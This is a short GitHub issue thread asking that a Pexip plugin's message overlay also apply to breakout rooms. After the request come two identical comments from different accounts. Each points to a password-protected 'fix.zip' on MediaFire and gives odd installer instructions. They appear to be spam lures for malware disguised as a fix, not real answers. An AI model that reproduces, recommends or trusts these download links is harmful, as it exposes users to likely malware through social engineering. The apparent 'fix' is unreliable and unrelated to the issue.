### ISSUE TITLE
Add support for breakout rooms

### ISSUE THREAD

**Issue by marcos-cereijo-pexip** [pexip/plugin-message-overlay#1]
Currently it only changes the `message overlay` to the main room. We should change also the message in all the breakout rooms.

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by TechHorizon2003** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
